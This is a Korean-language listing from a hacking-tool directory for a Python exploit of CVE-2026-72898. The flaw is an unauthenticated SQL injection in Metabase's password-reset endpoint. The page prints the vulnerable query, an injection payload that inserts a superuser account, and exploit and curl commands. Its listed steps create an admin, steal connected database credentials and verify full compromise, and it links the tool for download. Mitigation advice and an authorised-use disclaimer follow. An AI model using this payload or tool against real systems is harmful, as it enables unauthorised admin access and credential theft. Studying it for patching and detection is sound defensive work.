Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/34zy/cve-2026-72898
Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationWeb SecurityPenetration TestingRed TeamingDatabase Security
GitHub34zy/cve-2026-72898

CVE-2026-72898

CVE-2026-72898에 대한 Python 익스플로잇으로, Metabase의 비밀번호 재설정 엔드포인트에서 발생하는 인증되지 않은 SQL 인젝션을 이용해 관리자 계정을 생성하고 데이터베이스 자격 증명을 추출합니다.

저장소 보기
2020일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Metabase SQL 인젝션 RCE

CVSS 10.0 CRITICAL EXPLOITED NO AUTH

Exploitation Demo

Metabase /api/session/reset_password 엔드포인트의 인증되지 않은 SQL 인젝션입니다. 관리자 계정을 생성하고 데이터베이스 자격 증명을 추출합니다.

영향받는 버전: v58.0 - v63.3 | 패치됨: v58.24+, v59.21+, v60.17+, v61.11+, v62.9+, v63.5+


빠른 시작

pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check

취약점

SQL 쿼리의 문자열 연결:

# 취약한 코드
query = f"SELECT * FROM core_user WHERE email='{email}'"

공격 페이로드:

'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --

사용법

검사만 (수정 없음):

python3 CVE-2026-72898.py http://localhost:5000 --check

전체 익스플로잇:

python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!

수동 테스트:

# 엔드포인트 확인
curl http://localhost:5000/api/health

# SQLi 테스트
curl -X POST http://localhost:5000/api/session/reset_password \
  -H "Content-Type: application/json" \
  -d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'

수행 작업

  1. Metabase 인스턴스 탐지 (불리언 기반 SQLi)
  2. SQL 인젝션을 통한 관리자 사용자 생성
  3. 새 관리자로 인증
  4. 연결된 데이터베이스 자격 증명 추출
  5. 전체 시스템 침해 검증

영향

  • 인증되지 않은 관리자 접근
  • 데이터베이스 자격 증명 추출
  • 연결된 데이터베이스 침해
  • 전체 애플리케이션 제어

완화 방안

즉시:

  • 패치된 버전으로 업그레이드
  • WAF를 통한 /api/session/reset_password 차단
  • 관리자 계정의 무단 추가 여부 감사
  • 모든 데이터베이스 자격 증명 교체

추후:

  • 매개변수화된 쿼리 사용
  • 입력 검증 추가
  • 모든 민감한 엔드포인트에 인증 구현
  • SQL 쿼리 로깅 활성화

링크

  • GitHub Advisory
  • NVD CVE Entry

허가된 사용만 가능합니다. 무단 접근은 불법입니다.

도구 다운로드